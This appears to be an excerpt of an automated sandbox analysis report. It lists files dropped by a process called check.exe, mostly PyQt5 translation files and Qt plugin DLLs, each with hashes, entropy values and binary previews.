Category:	dropped
Size (bytes):	68592
Entropy (8bit):	6.125954940500008
Encrypted:	false
SSDEEP:	1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
MD5:	F66F6E9EDA956F72E3BB113407035E61
SHA1:	97328524DA8E82F5F92878F1C0421B38ECEC1E6C
SHA-256:	E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
SHA-512:	7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144368
Entropy (8bit):	6.294675868932723
Encrypted:	false
SSDEEP:	3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
MD5:	53A85F51054B7D58D8AD7C36975ACB96
SHA1:	893A757CA01472A96FB913D436AA9F8CFB2A297F
SHA-256:	D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
SHA-512:	35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	130
Entropy (8bit):	4.024232093209084
Encrypted:	false
SSDEEP:	3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
MD5:	8FF05B56C0995F90A80B7064AA6E915C
SHA1:	D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
SHA-256:	A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
SHA-512:	5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6813848812976975
Encrypted:	false
SSDEEP:	3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
MD5:	466EED6C184D2055488D4C5EA9AE5F20
SHA1:	8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
SHA-256:	9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
SHA-512:	D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.631479835393124
Encrypted:	false
SSDEEP:	3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
MD5:	6FBA66FE449866B478A2EBA66A724A02
SHA1:	EBEF6ED8460218CE8DF735659A8CBCD693600AC6
SHA-256:	171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
SHA-512:	2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	157
Entropy (8bit):	3.7483537099309427
Encrypted:	false
SSDEEP:	3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
MD5:	D033053C03C3ECFA2AA926E0E674F67F
SHA1:	B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
SHA-256:	3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
SHA-512:	2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
MD5:	E6A683F4A0883B5B0C7D30B847EF208C
SHA1:	FF2440DBBFE04AD86C6F285426AAFD49A895B128
SHA-256:	B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
SHA-512:	D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
MD5:	06168E1261BF72F49F94927723B2E1EB
SHA1:	DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
SHA-256:	5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
SHA-512:	AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6070658648473097
Encrypted:	false
SSDEEP:	3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
MD5:	EE47DFADBA4414FDC051C5CFBE71DDC1
SHA1:	DE650E96A9C130D35F8A498202773EF7FC875D27
SHA-256:	E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
SHA-512:	8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_fa.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	293121
Entropy (8bit):	5.272179385890926
Encrypted:	false
SSDEEP:	3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
MD5:	F9C3624197ACB30A9E6CC799BB65BED6
SHA1:	D715EAE24387DE15588F68C92991A93FAFB5EEAB
SHA-256:	B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
SHA-512:	199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......\|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...\|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_fi.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	117
Entropy (8bit):	3.739162292019161
Encrypted:	false
SSDEEP:	3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
MD5:	72882942B07B8AAC98034016E752B1A0
SHA1:	BF23B4C136B863B10E770019A2DF62FC988859DF
SHA-256:	048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
SHA-512:	403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.680458675741643
Encrypted:	false
SSDEEP:	3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
MD5:	3C45C665CFE036A7474CB4DCBB13CF40
SHA1:	62312DFF3C4CD38BAE8456C981601D0D89600F63
SHA-256:	8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
SHA-512:	21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_gd.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.463523104731333
Encrypted:	false
SSDEEP:	3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
MD5:	A8D55457C0413893F746D40B637F9C93
SHA1:	25123615482947772176E055E4A74043B2FBCAA0
SHA-256:	49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
SHA-512:	99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	323590
Entropy (8bit):	4.568068046062524
Encrypted:	false
SSDEEP:	3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
MD5:	0661FFABFBC50187F3BA38876B721946
SHA1:	EB5E7205355CFC6BCB4DF27E224079842C97B296
SHA-256:	204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
SHA-512:	65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB..I...........+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9......................)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_he.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	83
Entropy (8bit):	3.880645689209568
Encrypted:	false
SSDEEP:	3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
MD5:	DD5C2C6B148F2DB3E666B859776AE129
SHA1:	8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
SHA-256:	C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
SHA-512:	2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	8743
Entropy (8bit):	5.189558605179696
Encrypted:	false
SSDEEP:	192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
MD5:	CCD39A7C8139AD041E31B3E5D40968B4
SHA1:	5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
SHA-256:	222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
SHA-512:	9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......arB.....(.....d.0T.....5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................\|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8..9.0.Q.1. .F.3... .E.D.A.Q. .'.D..Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler........9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>..9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L..9.0.Q.1. .*.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10599
Entropy (8bit):	5.192287379770591
Encrypted:	false
SSDEEP:	192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
MD5:	5538049DA3A1D1D724AB6E11D2E2EDBE
SHA1:	7256BE390B88A053C0252488C443BE42F6F2D92A
SHA-256:	CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
SHA-512:	DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....\|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7444
Entropy (8bit):	4.580794980254807
Encrypted:	false
SSDEEP:	192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
MD5:	66722ED97BCBFD3DAE3C8264413859AB
SHA1:	400A93B213FCF9BBC9785881EA82ADB9F444CD6C
SHA-256:	ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
SHA-512:	B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	15297
Entropy (8bit):	4.708378368926237
Encrypted:	false
SSDEEP:	384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
MD5:	ED228F0F60AE9AEC28AB9171D5AE9590
SHA1:	7F061CF0C699D125A5531E3480C21964452F45EA
SHA-256:	4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
SHA-512:	794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!......K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4795
Entropy (8bit):	4.530246422531362
Encrypted:	false
SSDEEP:	96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
MD5:	1D09BEE1FB55A173F7EB39B9A662A170
SHA1:	C77F0A148262A91679F19689E4790B754D45D5D5
SHA-256:	6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
SHA-512:	BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....\|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_help_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7570
Entropy (8bit):	4.550982634910665
Encrypted:	false
SSDEEP:	96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
MD5:	3B070D169E3381E2FB081172934AAD00
SHA1:	70886EB7EF566B296D0814BD4C2440AC176699D6
SHA-256:	9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
